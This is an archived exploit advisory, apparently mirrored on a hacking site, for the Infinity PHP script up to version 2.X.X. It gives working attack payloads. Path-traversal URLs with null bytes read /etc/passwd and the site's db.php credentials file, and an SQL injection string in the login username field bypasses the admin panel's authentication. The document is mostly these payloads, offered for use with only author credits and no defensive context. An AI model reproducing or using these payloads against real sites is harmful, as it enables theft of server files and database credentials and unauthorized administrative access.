AOH :: HP Unsorted I :: BT-21538.HTM

Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities



Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities
Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities



-----------------Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities-------------------------=0D
Script : Infinity=0D
version : 2.X.X=0D
Language: PHP=0D
Site: http://www.dimofinf.net/=0D 
Author: SwEET-DeViL=0D
=0D
need magic_quotes_gpc = Off  <-----(<>=0D
=0D
----------------------------------------------------------------------------------------------------------------=0D
=0D
- +[Local File Disclosure]=0D
#Exploit:=0D
=0D
=0D
=0D
http://WWW.Site.Com/inf/?options[langfile]=../../../../../../etc/passwd%00=0D 
=0D
=0D
http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00=0D 
=0D
=0D
#=0D
###=0D
#=0D
#----------------------------------------------------------------------------------------------------------------=0D
- +[Auth Bypass]=0D
=0D
http://WWW.Site.Com/inf/cp=0D 
=0D
=0D
#Exploit:=0D
=0D
=0D
username : 'or 1=1/*=0D
=0D
password : SwEET-DeViL=0D
=0D
#----------------------------------------------------------------------------------------------------------------=0D
#=0D
###=0D
#=0D
=0D
=0D
/-------------www.arab4services.net-----------------\=0D 
|+------------------------------------------------+ |=0D
||          SwEET-DeViL & viP HaCkEr              | |=0D
||            gamr-14(at)hotmail.com              | |=0D
|+------------------------------------------------+ |=0D
\---------------------------------------------------/=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.